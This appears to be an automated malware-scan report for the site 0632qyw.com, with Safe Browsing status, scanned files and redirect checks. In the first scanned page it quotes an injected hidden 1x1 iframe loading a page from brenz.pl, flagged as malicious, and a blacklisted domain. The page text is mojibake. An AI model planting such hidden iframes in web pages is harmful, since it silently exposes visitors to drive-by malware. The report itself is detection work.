Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=0632qyw.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.0632qyw.com/ | 200 OK Content-Length: 51558 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.zzshw.net <html> <head> <title>ÔæׯÍøÂ繫˾-ÔæׯÍøÕ¾½¨Éè-ÍøÕ¾ÖÆ×÷-ÍøÕ¾Éè¼Æ-Ç°ÑؿƼ¼ÓÐÏÞ¹«Ë¾</title> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <meta name="keywords" content="ÍøÕ¾½¨Éè, ÍøÒ³Éè¼Æ, ÍøÒ³ÖÆ×÷, ÔæׯÍøÕ¾½¨Éè, ÍøÕ¾Íƹã, ÍøÕ¾²ß»®, ÆóÒµÉÏÍø, ÍøÂç¹ËÎÊ£¬ÔæׯÍøÒ³Éè¼Æ, ÆóÒµÍøÕ¾½¨Éè, ÔæׯÍøÒ³Éè¼Æ¹«Ë¾, ÔæׯÍøÂ繫˾, webso, ÔæׯÍøÕ¾ÖÆ×÷, ÍøÕ¾Éè¼Æ, ÍøÕ¾ÖÆ×÷¹«Ë¾"> <meta ...[4536 bytes skipped]... Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://www.0632qyw.com/images/AC_RunActiveContent.js | HTTP/1.1 200 OK Date: Wed, 03 Sep 2014 08:37:26 GMT Accept-Ranges: bytes ETag: "e0a16a4a38c7cc1:73ab" Server: IIS Content-Length: 3911 Content-Location: http://www.0632qyw.com/images/AC_RunActiveContent.js Content-Type: application/x-javascript Last-Modified: Fri, 30 Dec 2011 21:16:26 GMT X-Powered-By: WAF/2.0 | clean |
http://www.0632qyw.com/images/ac_runactivecontent.js | HTTP/1.1 200 OK Date: Wed, 03 Sep 2014 08:37:27 GMT Accept-Ranges: bytes ETag: "e0a16a4a38c7cc1:73ab" Server: IIS Content-Length: 3911 Content-Location: http://www.0632qyw.com/images/ac_runactivecontent.js Content-Type: application/x-javascript Last-Modified: Fri, 30 Dec 2011 21:16:26 GMT X-Powered-By: WAF/2.0 | clean |
http://www.0632qyw.com/test404page.js | 200 OK Content-Length: 3173 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 0632qyw.com
Result:
GET / HTTP/1.1
Host: 0632qyw.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: 0632qyw.com
Referer: http://www.google.com/search?q=0632qyw.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 0632qyw.com
Referer: http://www.google.com/search?q=0632qyw.com
Result:
The result is similar to the first query. There are no suspicious redirects found.